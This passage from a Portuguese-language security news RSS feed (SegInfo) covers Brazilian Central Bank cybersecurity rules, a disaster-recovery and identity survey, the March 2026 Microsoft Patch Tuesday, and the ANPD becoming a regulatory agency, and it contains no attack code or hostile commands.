<p class="wp-block-paragraph">Na prática, isso amplia a necessidade de controle sobre:</p>



<ul class="wp-block-list">
<li>Fornecedores e parceiros;</li>



<li>Sistemas adquiridos ou integrados;</li>



<li>Processos de desenvolvimento seguro.</li>
</ul>



<p class="wp-block-paragraph">Esse cenário aumenta a complexidade da gestão de riscos, especialmente em ambientes híbridos e baseados em nuvem.</p>



<h2 id="h-pix-e-str-passam-a-exigir-controles-mais-rigorosos" class="wp-block-heading"><strong>Pix e STR passam a exigir controles mais rigorosos</strong></h2>



<p class="wp-block-paragraph">Ambientes conectados à <strong>Rede do Sistema Financeiro Nacional (RSFN)</strong>, como Pix e STR, passam a ter exigências mais restritivas.</p>



<p class="wp-block-paragraph">Entre os principais pontos estão:</p>



<ul class="wp-block-list">
<li>Autenticação multifator para acessos administrativos;</li>



<li>Isolamento de ambientes críticos;</li>



<li>Controle reforçado de credenciais e certificados digitais;</li>



<li>Validação de integridade das transações.</li>
</ul>



<p class="wp-block-paragraph">Esses sistemas passam a ser tratados como <strong>infraestrutura crítica</strong>, exigindo maior nível de proteção e monitoramento.</p>



<h2 id="h-pentest-anual-e-evidencias-ganham-peso-regulatorio" class="wp-block-heading"><strong>Pentest anual e evidências ganham peso regulatório</strong></h2>



<p class="wp-block-paragraph">As normas também consolidam a obrigatoriedade de <strong>testes de invasão com periodicidade mínima anual</strong>, com necessidade de documentação formal dos resultados e dos planos de ação.</p>



<p class="wp-block-paragraph">Isso reforça o papel do pentest como parte da <strong>governança de segurança</strong>, e não apenas como atividade técnica pontual.</p>



<h3 id="h-adequacao-exige-integracao-entre-seguranca-e-governanca" class="wp-block-heading"><strong>Adequação exige integração entre segurança e governança</strong></h3>



<p class="wp-block-paragraph">Com as regras já em vigor, a adequação passa a exigir uma visão integrada entre <strong>Segurança da Informação, gestão de riscos e conformidade</strong>.</p>



<p class="wp-block-paragraph">Para muitas instituições, o desafio está em estruturar processos que sejam sustentáveis, auditáveis e aderentes às exigências regulatórias ao longo do tempo.</p>



<p class="wp-block-paragraph">Nesse contexto, iniciativas de <strong>GRC</strong> ganham protagonismo, permitindo organizar controles, evidências e gestão de riscos de forma centralizada.</p>



<p class="wp-block-paragraph">A Clavis apoia instituições nesse processo por meio de serviços de <a href="https://clavis.com.br/servicos/gap-analysis-avaliacao-de-conformidade/norma-bacen/"><strong>adequação às normas do Banco Central</strong></a>, incluindo diagnóstico de aderência (Gap Analysis), gestão de vulnerabilidades, execução de pentest com documentação auditável e estruturação de processos de governança e conformidade.</p>



<p class="wp-block-paragraph">Com o novo cenário regulatório, a capacidade de demonstrar controle e resiliência passa a ser tão relevante quanto a própria implementação de medidas de segurança.</p>



<p class="wp-block-paragraph">Para saber mais, clique <a href="https://clavis.com.br/blog/banco-central-reforca-exigencias-de-seguranca-cibernetica/" type="link" id="https://clavis.com.br/blog/banco-central-reforca-exigencias-de-seguranca-cibernetica/">aqui</a>.</p>
<p>The post <a href="https://seginfo.com.br/2026/03/20/novas-exigencias-do-banco-central-para-seguranca-cibernetica-ja-estao-em-vigor-e-ampliam-responsabilidades-no-setor-financeiro/">Novas exigências do Banco Central para segurança cibernética já estão em vigor e ampliam responsabilidades no setor financeiro</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></content:encoded>
					
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">74694</post-id>	<dc:creator>contato@clavis.com.br (Clavis Segurança da Informação)</dc:creator></item>
		<item>
		<title>Levantamento aponta baixa maturidade em testes de disaster recovery e reforça desafios em segurança de identidade</title>
		<link>https://seginfo.com.br/2026/03/18/levantamento-aponta-baixa-maturidade-em-testes-de-disaster-recovery-e-reforca-desafios-em-seguranca-de-identidade/</link>
		
		
		<pubDate>Wed, 18 Mar 2026 22:30:27 +0000</pubDate>
				<category><![CDATA[Artigos]]></category>
		<category><![CDATA[Notícia]]></category>
		<guid isPermaLink="false">https://seginfo.com.br/?p=74675</guid>

					<description><![CDATA[<p>Um estudo recente da Quest Software revela que uma parcela relevante das organizações ainda não valida de forma consistente sua capacidade de recuperação após incidentes de segurança. De acordo com o relatório State of ITDR, 24% das empresas afirmam nunca testar seus planos de disaster recovery, evidenciando lacunas importantes na preparação para cenários de crise.&#8230; <span class="excerpt-more"><a href="https://seginfo.com.br/2026/03/18/levantamento-aponta-baixa-maturidade-em-testes-de-disaster-recovery-e-reforca-desafios-em-seguranca-de-identidade/">Read More</a></span></p>
<p>The post <a href="https://seginfo.com.br/2026/03/18/levantamento-aponta-baixa-maturidade-em-testes-de-disaster-recovery-e-reforca-desafios-em-seguranca-de-identidade/">Levantamento aponta baixa maturidade em testes de disaster recovery e reforça desafios em segurança de identidade</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="550" src="https://seginfo.com.br/wp-content/uploads/2026/03/Img-de-destaque-seginfo-tamanho-blog-1024x550.png" alt="" class="wp-image-74677" srcset="https://seginfo.com.br/wp-content/uploads/2026/03/Img-de-destaque-seginfo-tamanho-blog-1024x550.png 1024w, https://seginfo.com.br/wp-content/uploads/2026/03/Img-de-destaque-seginfo-tamanho-blog-300x161.png 300w, https://seginfo.com.br/wp-content/uploads/2026/03/Img-de-destaque-seginfo-tamanho-blog-150x81.png 150w, https://seginfo.com.br/wp-content/uploads/2026/03/Img-de-destaque-seginfo-tamanho-blog-768x412.png 768w, https://seginfo.com.br/wp-content/uploads/2026/03/Img-de-destaque-seginfo-tamanho-blog-894x480.png 894w, https://seginfo.com.br/wp-content/uploads/2026/03/Img-de-destaque-seginfo-tamanho-blog.png 1043w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<p class="wp-block-paragraph">Um estudo recente da Quest Software revela que uma parcela relevante das organizações ainda não valida de forma consistente sua capacidade de recuperação após incidentes de segurança. De acordo com o relatório <em>State of ITDR</em>, <strong>24% das empresas afirmam nunca testar seus planos de disaster recovery</strong>, evidenciando lacunas importantes na preparação para cenários de crise.</p>



<p class="wp-block-paragraph">A pesquisa ouviu <strong>650 profissionais de TI e Segurança da Informação</strong> e analisa práticas relacionadas a <strong>Identity Threat Detection and Response (ITDR)</strong>, em um contexto de aumento da complexidade operacional e expansão das superfícies de ataque.</p>



<h2 id="h-recuperacao-ainda-nao-e-prioridade-em-muitas-organizacoes" class="wp-block-heading"><strong>Recuperação ainda não é prioridade em muitas organizações</strong></h2>



<p class="wp-block-paragraph">Apesar do avanço de controles preventivos, os dados indicam que a etapa de recuperação ainda recebe menos atenção do que deveria. A ausência de testes regulares pode comprometer diretamente a capacidade de resposta em situações reais, especialmente em incidentes que envolvem indisponibilidade de sistemas, comprometimento de credenciais ou vazamento de dados.</p>



<p class="wp-block-paragraph">Do ponto de vista de governança, isso evidencia uma fragilidade na integração entre <strong>gestão de riscos, continuidade de negócios e Segurança da Informação</strong> — pilares que deveriam atuar de forma coordenada.</p>



<h2 id="h-identidade-digital-amplia-a-superficie-de-ataque" class="wp-block-heading"><strong>Identidade digital amplia a superfície de ataque</strong></h2>



<p class="wp-block-paragraph">O relatório também reforça que a identidade continua sendo um dos principais pontos de exposição nas organizações. A multiplicidade de identidades distribuídas entre ambientes on-premises, cloud e híbridos aumenta a complexidade da gestão de acessos.</p>



<p class="wp-block-paragraph">Além disso, o crescimento acelerado de <strong>identidades não humanas</strong> — como contas de serviço, aplicações e automações — tem ampliado os desafios de controle. Em muitos cenários, essas identidades já superam em volume os usuários humanos, dificultando a visibilidade e o monitoramento.</p>



<p class="wp-block-paragraph">Entre os respondentes, <strong>mais da metade aponta esse tipo de identidade como uma das áreas mais difíceis de proteger</strong>, seguida por contas de terceiros e sistemas legados.</p>



<h2 id="h-ia-impulsiona-ameacas-e-tambem-solucoes" class="wp-block-heading"><strong>IA impulsiona ameaças e também soluções</strong></h2>



<p class="wp-block-paragraph">O uso de <strong>inteligência artificial</strong> também aparece como um fator relevante no cenário atual. O relatório destaca o aumento de ataques automatizados, manipulação de dados e novos vetores associados ao uso de IA.</p>



<p class="wp-block-paragraph">Ao mesmo tempo, a tecnologia é vista como aliada: <strong>79% dos entrevistados acreditam que soluções baseadas em IA podem aumentar a eficácia das estratégias de ITDR</strong>, principalmente na detecção de comportamentos anômalos e resposta a incidentes.</p>



<h2 id="h-adocao-de-itdr-cresce-mas-maturidade-ainda-e-desigual" class="wp-block-heading"><strong>Adoção de ITDR cresce, mas maturidade ainda é desigual</strong></h2>



<p class="wp-block-paragraph">A pesquisa aponta avanço na adoção de práticas de ITDR, com <strong>57% das organizações afirmando já utilizar esse tipo de abordagem</strong>, um crescimento em relação ao ano anterior.</p>



<p class="wp-block-paragraph">Apesar disso, desafios persistem, especialmente na obtenção de visibilidade completa sobre o ambiente de identidades e na gestão de riscos em infraestruturas distribuídas.</p>



<h2 id="h-falta-de-integracao-entre-prevencao-e-recuperacao" class="wp-block-heading"><strong>Falta de integração entre prevenção e recuperação</strong></h2>



<p class="wp-block-paragraph">Um dos principais pontos de atenção levantados pelo estudo é o desequilíbrio entre investimentos em prevenção e preparação para resposta e recuperação. Muitas organizações continuam priorizando controles de proteção, sem garantir que processos de recuperação estejam devidamente testados e atualizados.</p>



<p class="wp-block-paragraph">Nesse cenário, frameworks como o <strong>NIST Cybersecurity Framework</strong> ganham relevância ao propor uma abordagem integrada, baseada em funções como identificar, proteger, detectar, responder e recuperar.</p>



<h2 id="h-ambientes-ot-exigem-atencao-adicional" class="wp-block-heading"><strong>Ambientes OT exigem atenção adicional</strong></h2>



<p class="wp-block-paragraph">Em ambientes de <strong>tecnologia operacional (OT)</strong>, esse cenário tende a ser ainda mais crítico. Nesses contextos, testes de disaster recovery frequentemente não são realizados ou se limitam a simulações básicas, voltadas apenas ao cumprimento de requisitos formais.</p>



<p class="wp-block-paragraph">A ausência de validações mais robustas pode ampliar o impacto de incidentes, especialmente em operações que dependem de disponibilidade contínua e possuem maior complexidade para execução de testes completos.</p>



<h2 id="h-grc-como-base-para-resiliencia" class="wp-block-heading"><strong>GRC como base para resiliência</strong></h2>



<p class="wp-block-paragraph">Diante desse cenário, especialistas apontam que a evolução da maturidade em segurança passa necessariamente pelo fortalecimento de práticas de <strong>Governança, Risco e Compliance (GRC)</strong>.</p>



<p class="wp-block-paragraph">A adoção de soluções estruturadas, como as oferecidas pela <strong><a href="https://clavis.com.br/" type="link" id="https://clavis.com.br/">Clavis Segurança da Informação</a></strong>, permite às organizações integrar:</p>



<ul class="wp-block-list">
<li>Gestão de riscos cibernéticos;</li>



<li>Mapeamento de ativos e identidades;</li>



<li>Definição e acompanhamento de controles;</li>



<li>Aderência a frameworks como NIST e ISO 27001;</li>



<li>Monitoramento contínuo de conformidade.<br></li>
</ul>



<p class="wp-block-paragraph">Além disso, iniciativas como <strong>Gap Analysis </strong>e <strong>auditorias técnicas</strong> contribuem para validar, na prática, a capacidade de resposta e recuperação diante de incidentes.</p>



<h2 id="h-necessidade-de-evolucao-continua" class="wp-block-heading"><strong>Necessidade de evolução contínua</strong></h2>



<p class="wp-block-paragraph">Os dados do estudo indicam que, embora haja avanço na adoção de estratégias de detecção e resposta, ainda existe uma lacuna significativa na preparação para cenários de recuperação.</p>



<p class="wp-block-paragraph">Em um ambiente onde ataques se tornam mais frequentes e sofisticados, a capacidade de restaurar operações de forma rápida e segura passa a ser tão crítica quanto prevenir incidentes — exigindo uma abordagem mais integrada entre segurança, governança e continuidade.</p>



<p class="wp-block-paragraph">Para saber mais, clique <a href="https://www.quest.com/news/press-releases/quest-software-identity-disaster-recovery-testing-survey/">aqui</a>.</p>
<p>The post <a href="https://seginfo.com.br/2026/03/18/levantamento-aponta-baixa-maturidade-em-testes-de-disaster-recovery-e-reforca-desafios-em-seguranca-de-identidade/">Levantamento aponta baixa maturidade em testes de disaster recovery e reforça desafios em segurança de identidade</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></content:encoded>
					
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">74675</post-id>	<dc:creator>contato@clavis.com.br (Clavis Segurança da Informação)</dc:creator></item>
		<item>
		<title>Patch Tuesday de março corrige 79 vulnerabilidades em produtos Microsoft, incluindo duas falhas zero-day</title>
		<link>https://seginfo.com.br/2026/03/13/patch-tuesday-de-marco-corrige-79-vulnerabilidades-em-produtos-microsoft-incluindo-duas-falhas-zero-day/</link>
		
		
		<pubDate>Fri, 13 Mar 2026 12:00:00 +0000</pubDate>
				<category><![CDATA[Notícia]]></category>
		<category><![CDATA[microsoft]]></category>
		<category><![CDATA[patch tuesday]]></category>
		<category><![CDATA[zero-day]]></category>
		<guid isPermaLink="false">https://seginfo.com.br/?p=74631</guid>

					<description><![CDATA[<p>A Microsoft divulgou as atualizações de segurança do Patch Tuesday de março de 2026, corrigindo 79 vulnerabilidades em diferentes produtos da empresa. Entre as falhas resolvidas estão duas vulnerabilidades zero-day divulgadas publicamente, além de problemas críticos que afetam aplicações amplamente utilizadas, como componentes do Microsoft Office. De acordo com a empresa, o pacote de correções&#8230; <span class="excerpt-more"><a href="https://seginfo.com.br/2026/03/13/patch-tuesday-de-marco-corrige-79-vulnerabilidades-em-produtos-microsoft-incluindo-duas-falhas-zero-day/">Read More</a></span></p>
<p>The post <a href="https://seginfo.com.br/2026/03/13/patch-tuesday-de-marco-corrige-79-vulnerabilidades-em-produtos-microsoft-incluindo-duas-falhas-zero-day/">Patch Tuesday de março corrige 79 vulnerabilidades em produtos Microsoft, incluindo duas falhas zero-day</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="683" src="https://seginfo.com.br/wp-content/uploads/2026/03/SegInfo-Patch-Tuesday-1024x683.png" alt="" class="wp-image-74634" srcset="https://seginfo.com.br/wp-content/uploads/2026/03/SegInfo-Patch-Tuesday-1024x683.png 1024w, https://seginfo.com.br/wp-content/uploads/2026/03/SegInfo-Patch-Tuesday-300x200.png 300w, https://seginfo.com.br/wp-content/uploads/2026/03/SegInfo-Patch-Tuesday-150x100.png 150w, https://seginfo.com.br/wp-content/uploads/2026/03/SegInfo-Patch-Tuesday-768x512.png 768w, https://seginfo.com.br/wp-content/uploads/2026/03/SegInfo-Patch-Tuesday-1170x780.png 1170w, https://seginfo.com.br/wp-content/uploads/2026/03/SegInfo-Patch-Tuesday-720x480.png 720w, https://seginfo.com.br/wp-content/uploads/2026/03/SegInfo-Patch-Tuesday.png 1536w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<p class="wp-block-paragraph">A Microsoft divulgou as atualizações de segurança do <strong>Patch Tuesday de março de 2026</strong>, corrigindo <strong>79 vulnerabilidades</strong> em diferentes produtos da empresa. Entre as falhas resolvidas estão <strong>duas vulnerabilidades zero-day divulgadas publicamente</strong>, além de problemas críticos que afetam aplicações amplamente utilizadas, como componentes do Microsoft Office.</p>



<p class="wp-block-paragraph">De acordo com a empresa, o pacote de correções inclui <strong>três vulnerabilidades classificadas como críticas</strong>, duas delas relacionadas à <strong>execução remota de código (RCE)</strong> e outra associada à <strong>exposição de informações sensíveis</strong>.</p>



<h2 id="h-falhas-abrangem-diferentes-categorias-de-risco" class="wp-block-heading"><strong>Falhas abrangem diferentes categorias de risco</strong></h2>



<p class="wp-block-paragraph">As vulnerabilidades corrigidas neste ciclo de atualizações abrangem diversas categorias de segurança. Entre elas estão:</p>



<ul class="wp-block-list">
<li><strong>46 falhas de elevação de privilégios</strong></li>



<li><strong>18 vulnerabilidades de execução remota de código</strong></li>



<li><strong>10 problemas de divulgação de informação</strong></li>



<li><strong>4 vulnerabilidades de negação de serviço</strong></li>



<li><strong>4 falhas de spoofing</strong></li>



<li><strong>2 vulnerabilidades de bypass de mecanismos de segurança</strong></li>
</ul>



<p class="wp-block-paragraph">Esse conjunto de correções reforça a importância da gestão contínua de patches em ambientes corporativos, especialmente em infraestruturas que utilizam amplamente produtos Microsoft.</p>



<h2 id="h-zero-days-ja-haviam-sido-divulgadas-publicamente" class="wp-block-heading"><strong>Zero-days já haviam sido divulgadas publicamente</strong></h2>



<p class="wp-block-paragraph">As duas vulnerabilidades zero-day corrigidas neste Patch Tuesday já haviam sido divulgadas publicamente antes da liberação das atualizações. A primeira vulnerabilidade, identificada como <strong>CVE-2026-21262</strong>, afeta o <strong>Microsoft SQL Server</strong>. A falha pode permitir que um usuário autenticado eleve privilégios por meio de acesso via rede, obtendo permissões administrativas no ambiente de banco de dados. O problema foi identificado pelo pesquisador de segurança Erland Sommarskog.</p>



<p class="wp-block-paragraph">A segunda falha, <strong>CVE-2026-26127</strong>, está relacionada à plataforma <strong>.NET</strong> e pode ser explorada para provocar <strong>negação de serviço</strong>, explorando um erro de leitura fora dos limites de memória.</p>



<h2 id="h-vulnerabilidades-de-execucao-remota-no-microsoft-office" class="wp-block-heading"><strong>Vulnerabilidades de execução remota no Microsoft Office</strong></h2>



<p class="wp-block-paragraph">O pacote Microsoft Office também recebeu correções relevantes neste ciclo de atualizações. Duas vulnerabilidades de <strong>execução remota de código</strong>, identificadas como <strong>CVE-2026-26110</strong> e <strong>CVE-2026-26113</strong>, podem ser exploradas através do <strong>painel de pré-visualização de arquivos</strong>.</p>



<p class="wp-block-paragraph">Esse tipo de vulnerabilidade pode representar risco significativo em cenários de ataques baseados em documentos maliciosos distribuídos por e-mail ou outras plataformas de compartilhamento de arquivos.</p>



<h2 id="h-falha-no-excel-pode-permitir-exfiltracao-de-dados-via-copilot" class="wp-block-heading"><strong>Falha no Excel pode permitir exfiltração de dados via Copilot</strong></h2>



<p class="wp-block-paragraph">Outra vulnerabilidade destacada nas atualizações é a <strong>CVE-2026-26144</strong>, que afeta o <strong>Microsoft Excel</strong> e pode permitir a exfiltração<strong> de dados através do Microsoft Copilot</strong>.</p>



<p class="wp-block-paragraph">De acordo com a Microsoft, um atacante poderia explorar a falha para induzir o modo Agent do Copilot a enviar dados por conexões de rede não previstas, criando um possível cenário de exposição de informações sem interação do usuário.</p>



<p class="wp-block-paragraph">O caso ilustra desafios emergentes relacionados à segurança de ferramentas baseadas em <strong>inteligência artificial integradas a aplicações corporativas</strong>.</p>



<h2 id="h-atualizacoes-devem-ser-aplicadas-rapidamente" class="wp-block-heading"><strong>Atualizações devem ser aplicadas rapidamente</strong></h2>



<p class="wp-block-paragraph">Especialistas recomendam que organizações e usuários instalem as atualizações de segurança o mais rápido possível para reduzir a superfície de ataque e minimizar o risco de exploração dessas vulnerabilidades.</p>



<p class="wp-block-paragraph">Em ambientes corporativos, a aplicação rápida de patches continua sendo uma das medidas mais importantes para mitigar riscos associados a falhas de segurança em softwares amplamente utilizados.</p>
<p>The post <a href="https://seginfo.com.br/2026/03/13/patch-tuesday-de-marco-corrige-79-vulnerabilidades-em-produtos-microsoft-incluindo-duas-falhas-zero-day/">Patch Tuesday de março corrige 79 vulnerabilidades em produtos Microsoft, incluindo duas falhas zero-day</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></content:encoded>
					
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">74631</post-id>	<dc:creator>contato@clavis.com.br (Clavis Segurança da Informação)</dc:creator></item>
		<item>
		<title>Senado aprova MP que transforma ANPD em agência reguladora e reforça fiscalização de proteção de dados</title>
		<link>https://seginfo.com.br/2026/03/10/senado-aprova-mp-que-transforma-anpd-em-agencia-reguladora-e-reforca-fiscalizacao-de-protecao-de-dados/</link>
		
		
		<pubDate>Tue, 10 Mar 2026 12:00:00 +0000</pubDate>
				<category><![CDATA[Notícia]]></category>
		<category><![CDATA[ANPD]]></category>
		<category><![CDATA[LGPD]]></category>
		<category><![CDATA[proteção de dados]]></category>
		<guid isPermaLink="false">https://seginfo.com.br/?p=74622</guid>

					<description><![CDATA[<p>O Senado Federal aprovou em 24 de fevereiro a Medida Provisória nº 1.317/2025, que altera a estrutura institucional da Autoridade Nacional de Proteção de Dados (ANPD). Com a medida, o órgão passa a ser formalmente reconhecido como Agência Nacional de Proteção de Dados, com autonomia funcional, técnica, administrativa e financeira.&#160; A mudança representa um avanço&#8230; <span class="excerpt-more"><a href="https://seginfo.com.br/2026/03/10/senado-aprova-mp-que-transforma-anpd-em-agencia-reguladora-e-reforca-fiscalizacao-de-protecao-de-dados/">Read More</a></span></p>
<p>The post <a href="https://seginfo.com.br/2026/03/10/senado-aprova-mp-que-transforma-anpd-em-agencia-reguladora-e-reforca-fiscalizacao-de-protecao-de-dados/">Senado aprova MP que transforma ANPD em agência reguladora e reforça fiscalização de proteção de dados</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="572" src="https://seginfo.com.br/wp-content/uploads/2026/03/SegInfo-0903-1024x572.png" alt="" class="wp-image-74623" srcset="https://seginfo.com.br/wp-content/uploads/2026/03/SegInfo-0903-1024x572.png 1024w, https://seginfo.com.br/wp-content/uploads/2026/03/SegInfo-0903-300x167.png 300w, https://seginfo.com.br/wp-content/uploads/2026/03/SegInfo-0903-150x84.png 150w, https://seginfo.com.br/wp-content/uploads/2026/03/SegInfo-0903-768x429.png 768w, https://seginfo.com.br/wp-content/uploads/2026/03/SegInfo-0903-1536x857.png 1536w, https://seginfo.com.br/wp-content/uploads/2026/03/SegInfo-0903-2048x1143.png 2048w, https://seginfo.com.br/wp-content/uploads/2026/03/SegInfo-0903-1170x653.png 1170w, https://seginfo.com.br/wp-content/uploads/2026/03/SegInfo-0903-1835x1024.png 1835w, https://seginfo.com.br/wp-content/uploads/2026/03/SegInfo-0903-860x480.png 860w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<p class="wp-block-paragraph">O Senado Federal aprovou em <strong>24 de fevereiro</strong> a Medida Provisória nº 1.317/2025, que altera a estrutura institucional da Autoridade Nacional de Proteção de Dados (ANPD). Com a medida, o órgão passa a ser formalmente reconhecido como <strong>Agência Nacional de Proteção de Dados</strong>, com autonomia funcional, técnica, administrativa e financeira.&nbsp;</p>



<p class="wp-block-paragraph">A mudança representa um avanço na consolidação da governança de proteção de dados no Brasil e pode fortalecer a capacidade do país de lidar com riscos associados ao uso intensivo de dados pessoais no ambiente digital.</p>



<h2 id="h-reforco-institucional-da-autoridade-de-dados" class="wp-block-heading"><strong>Reforço institucional da autoridade de dados</strong></h2>



<p class="wp-block-paragraph">A transformação da ANPD em agência reguladora federal amplia sua autonomia e fortalece sua posição dentro da estrutura administrativa do Estado. Na prática, isso tende a ampliar a capacidade de atuação do órgão em atividades como <strong>regulação, fiscalização e aplicação da Lei Geral de Proteção de Dados (LGPD)</strong>.</p>



<p class="wp-block-paragraph">Autoridades de proteção de dados com maior autonomia institucional são consideradas um elemento importante para garantir a efetividade de legislações de privacidade. No contexto da Segurança da Informação, o fortalecimento da estrutura regulatória também contribui para ampliar a pressão por <strong>boas práticas de governança de dados, gestão de riscos e proteção de informações sensíveis</strong>.</p>



<h2 id="h-nova-carreira-para-regulacao-e-fiscalizacao" class="wp-block-heading"><strong>Nova carreira para regulação e fiscalização</strong></h2>



<p class="wp-block-paragraph">Entre os pontos previstos na medida está a criação da <strong>Carreira de Regulação e Fiscalização de Proteção de Dados</strong>, com cargos efetivos de Especialista em Regulação de Proteção de Dados.</p>



<p class="wp-block-paragraph">A iniciativa busca ampliar a capacidade técnica da autoridade reguladora, permitindo atuação especializada em atividades como:</p>



<ul class="wp-block-list">
<li>Elaboração de normas e diretrizes regulatórias;</li>



<li>Fiscalização de organizações públicas e privadas;</li>



<li>Realização de auditorias e análises técnicas;</li>



<li>Estudos sobre riscos associados ao tratamento de dados pessoais;</li>



<li>Implementação de políticas públicas voltadas à proteção de dados.</li>
</ul>



<p class="wp-block-paragraph">Do ponto de vista da Segurança da Informação, o fortalecimento técnico da autoridade reguladora pode contribuir para elevar o nível de maturidade das organizações brasileiras em práticas como <strong>gestão de incidentes, proteção de dados sensíveis e controles de segurança aplicados ao tratamento de informações pessoais</strong>.</p>



<h2 id="h-novas-atribuicoes-no-ambiente-digital" class="wp-block-heading"><strong>Novas atribuições no ambiente digital</strong></h2>



<p class="wp-block-paragraph">A reestruturação da ANPD também ocorre em um contexto de ampliação de responsabilidades relacionadas à proteção de direitos no ambiente digital.</p>



<p class="wp-block-paragraph">O Decreto nº 12.622/2025 atribui à autoridade de dados funções relacionadas à implementação do chamado <strong>Estatuto Digital da Criança e do Adolescente</strong>, ampliando o papel da instituição na supervisão de atividades online que envolvem dados de menores.</p>



<p class="wp-block-paragraph">Esse cenário aumenta a complexidade regulatória envolvendo plataformas digitais, aplicações online e serviços baseados em dados, exigindo mecanismos mais robustos de fiscalização e acompanhamento por parte da autoridade reguladora.</p>



<h2 id="h-impactos-para-organizacoes-e-gestao-de-riscos" class="wp-block-heading"><strong>Impactos para organizações e gestão de riscos</strong></h2>



<p class="wp-block-paragraph">Com uma estrutura institucional mais consolidada, a expectativa é que a agência amplie sua capacidade de atuação em temas como <strong>monitoramento de incidentes de segurança, fiscalização do tratamento de dados pessoais e análise de práticas adotadas por empresas e órgãos públicos</strong>.</p>



<p class="wp-block-paragraph">Para organizações que lidam com grandes volumes de dados, especialmente em ambientes digitais, isso reforça a necessidade de fortalecer programas de <strong>governança de dados, privacidade e Segurança da Informação</strong>, incluindo medidas como controles de acesso, gestão de vulnerabilidades e resposta a incidentes.</p>



<p class="wp-block-paragraph">A consolidação da agência reguladora também tende a trazer maior previsibilidade regulatória para empresas que buscam adequação à LGPD e às normas complementares relacionadas ao tratamento de dados.</p>



<p class="wp-block-paragraph">Para saber mais, clique <a href="https://www.gov.br/anpd/pt-br/assuntos/noticias/congresso-aprova-mp-que-transforma-a-anpd-em-agencia-reguladora-e-fortalece-a-protecao-de-criancas-e-adolescentes-no-ambiente-digital" type="link" id="https://www.gov.br/anpd/pt-br/assuntos/noticias/congresso-aprova-mp-que-transforma-a-anpd-em-agencia-reguladora-e-fortalece-a-protecao-de-criancas-e-adolescentes-no-ambiente-digital">aqui</a>.</p>
<p>The post <a href="https://seginfo.com.br/2026/03/10/senado-aprova-mp-que-transforma-anpd-em-agencia-reguladora-e-reforca-fiscalizacao-de-protecao-de-dados/">Senado aprova MP que transforma ANPD em agência reguladora e reforça fiscalização de proteção de dados</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></content:encoded>
					
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">74622</post-id>	<dc:creator>contato@clavis.com.br (Clavis Segurança da Informação)</dc:creator></item>
		<item>
		<title>Google: quase metade dos zero-days explorados em 2025 teve como alvo empresas</title>
		<link>https://seginfo.com.br/2026/03/06/google-quase-metade-dos-zero-days-explorados-em-2025-teve-como-alvo-empresas/</link>
		
		
		<pubDate>Fri, 06 Mar 2026 21:52:29 +0000</pubDate>
				<category><![CDATA[Uncategorized]]></category>
		<guid isPermaLink="false">https://seginfo.com.br/?p=74571</guid>

					<description><![CDATA[<p>O Google revelou que 90 vulnerabilidades do tipo zero-day foram exploradas ativamente em 2025, e quase metade delas teve como alvo tecnologias utilizadas em ambientes corporativos. Os dados fazem parte de um relatório divulgado pelo Google Threat Intelligence Group (GTIG), que analisa tendências globais de exploração de falhas críticas. Segundo a empresa, o número de&#8230; <span class="excerpt-more"><a href="https://seginfo.com.br/2026/03/06/google-quase-metade-dos-zero-days-explorados-em-2025-teve-como-alvo-empresas/">Read More</a></span></p>
<p>The post <a href="https://seginfo.com.br/2026/03/06/google-quase-metade-dos-zero-days-explorados-em-2025-teve-como-alvo-empresas/">Google: quase metade dos zero-days explorados em 2025 teve como alvo empresas</a> appeared first on <a href="https://seginfo.com.br">SegInfo - Portal, Podcast e Evento sobre Segurança da Informação</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img loading="lazy" decoding="async" width="1024" height="574" src="https://seginfo.com.br/wp-content/uploads/2026/03/AdobeStock_1794356284-1024x574.jpeg" alt="" class="wp-image-74573" style="width:700px;height:auto" srcset="https://seginfo.com.br/wp-content/uploads/2026/03/AdobeStock_1794356284-1024x574.jpeg 1024w, https://seginfo.com.br/wp-content/uploads/2026/03/AdobeStock_1794356284-300x168.jpeg 300w, https://seginfo.com.br/wp-content/uploads/2026/03/AdobeStock_1794356284-150x84.jpeg 150w, https://seginfo.com.br/wp-content/uploads/2026/03/AdobeStock_1794356284-768x430.jpeg 768w, https://seginfo.com.br/wp-content/uploads/2026/03/AdobeStock_1794356284-1536x861.jpeg 1536w, https://seginfo.com.br/wp-content/uploads/2026/03/AdobeStock_1794356284-2048x1148.jpeg 2048w, https://seginfo.com.br/wp-content/uploads/2026/03/AdobeStock_1794356284-1170x656.jpeg 1170w, https://seginfo.com.br/wp-content/uploads/2026/03/AdobeStock_1794356284-1828x1024.jpeg 1828w, https://seginfo.com.br/wp-content/uploads/2026/03/AdobeStock_1794356284-857x480.jpeg 857w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
</div>


